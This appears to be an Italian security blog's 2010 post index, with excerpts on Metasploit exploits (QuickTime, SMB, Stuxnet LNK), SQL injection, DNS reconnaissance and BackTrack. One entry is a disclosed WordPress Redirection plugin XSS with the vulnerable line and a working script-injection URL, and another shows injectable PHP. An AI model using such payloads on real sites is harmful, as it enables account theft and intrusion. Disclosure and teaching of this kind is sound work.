agosto 14th, 2010 by clshack
Nuova falla per Apple QuickTime 7.6.6 fixata il 12 agosto 2010, con il rilascio della versione 7.6.7.
Dal sito ufficiale:
CVE-ID: CVE-2010-1799
Available for: Windows 7, Vista, XP SP2 or later
Impact: Viewing a maliciously crafted movie file may lead to un unexpected application termination or arbitrary code execution.
Description: A stack buffer overflow exists in QuickTime’s error logging. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed by disabling debug logging. This issue does not affect Mac OS X systems.
Vediamo come utilizzare questo exploit con metasploit o.O
Aggiorniamo metasploit:
sudo svn update
More…
agosto 12th, 2010 by clshack
Evilsocket, nel febbraio 2010 mi aveva aperto gli occhi, sul come da una normale sql injection blind o normal che sia, è possibile aprirsi una shell remota sul server vittima :D
Vediamo un esempio di codice php buggato:
mysql_query("SELECT a FROM b WHERE id=".$_GET['id']);
Come vediamo, il parametro id non viene filtrato …
Sarebbe opportuno, per essere invulnerabili, inserire un:
(int) $_GET['id']
Ora nella variabile $_GET['id'] possiamo inserire codice sql :D
More…
agosto 12th, 2010 by clshack
E il nostro amico g-laurent, famoso per i suoi exploit ha scoperto una nuova vulnerabilità del protocollo SMB di windows :P
Cosa possiamo fare con questo exploit o.O ?
Dal sito microsoft:
Vulnerability details
In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default)
More…
agosto 7th, 2010 by clshack
Dal sito ufficiale, leggiamo:
Fierce Domain Scan was born out of a frustration while performing a web application security audit. It used to be very time-consuming to discover large swaths of a non-contiguous corporate network, but it doesn’t have to be. It’s terribly easy to run a scanner against an IP range, but if a network’s web presence is distributed across multiple ranges, you can miss huge chunks of networks. Fierce helps solve that problem.
Fierce is a reconnaissance tool written in Perl that quickly scans domains (usually in just a few minutes, assuming no network lag) using a variety of techniques to locate undocumented, internal or just hard-to-find resources via the DNS system.
In poche parole, è facile da usare, è scritto in perl, ed è molto potente :D
Ma a cosa ci serve ? o.O
A scoprire tutti i sotto domini dei siti vittima e altre informazioni utili :D ecc ecc ecc :D
Vediamo come installarlo e usarlo :D
More…
agosto 5th, 2010 by clshack
Molte novità interessanti :D sopratutto:
full Fluxbox desktop environment has been added
Oltre al kernel aggiornato, a nuovi tools e ai nuovi driver disponibili :D
Changelog ufficiale:
- Kernel 2.6.34 – With fragmentation patches, etc.
- Updated tools, such as Maltego and SET.
- Improved driver support, broader range of wireless cards supported.
- Faster desktop experience due to kernel.
- Fluxbox environment added.
DOWNLOAD
agosto 1st, 2010 by clshack
Panicoo, si avevo voglia di un titolo in inglese o.O
Vediamo oggi come attaccare un computer con metasploit, sfruttando un xss, assieme a BeEF(browser exploitation framework)
XSS WIKI:
Il Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell’input (parametri di richieste HTTP GET o contenuto di richieste HTTP POST). Un XSS permette ad un attaccante di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo si potranno sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina.
…
…
Bene, cominciamo :D
More…
luglio 30th, 2010 by clshack
# Exploit Title: [Wordpress] Redirection Plugin <= 2.2.27 XSS
# Date: 29-07-2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/redirection/
# Version: <=2.2.27
# Tested on: wordpress 3.0.1
Page:
redirection/view/admin/log.php
Line:13
<input type="hidden" name="sub" value="<strong><?php echo $_GET['sub'] ?></strong>"/>
Exploit:
wp-admin/tools.php?page=redirection.php&curpage=1&sub=log&sub="><script>alert(document.cookie)</script>
Bisogna filtrare l’input :D
Approfondimenti XSS.
luglio 29th, 2010 by clshack
luglio 28th, 2010 by clshack
Ne parlano quasi tutti, però non tutti sanno che è uscito il modulo, per sfruttare questo exploit con metasploit :D
Stuxnet, è un worm che si sta diffondendo sempre più velocemnte, sfruttando la vulnerabilità:CVE-2010-2568 che sfrutta una solita cattiva gestione dei file LNK di windows, permettendo ad attaccker di eseguire codice remoto sulla vittima, oppure propagando i file maligni tramite supporti rimovibili.
I prodotti vulnerabili, sono:
- Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows Vista Service Pack 1 and Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems
- Windows Server 2008 R2 for Itanium-based Systems
Vediamo come sfruttare questa vulnerabilità con metasploit :D
More…
luglio 27th, 2010 by clshack
Vediamo come installare backtrack in persistent mode su una chiavetta usb :D
Software necessario:
uNetBootIn:Installare facilmente distribuzioni Linux su USB.
E un partizionatore :D se siete pratici fate da terminale altrimenti più comodamente si può usare gparted.
Adesso partizioniamo la nostra chiavetta, (consiglio una da 4 GB).
Creiamo una partizione fat32 da 1.8 GB e chiamiamola come vogliamo ;)
Creiamo un’altra partizione, il restante spazio in ext3 e chiamiamola: casper-rw
More…
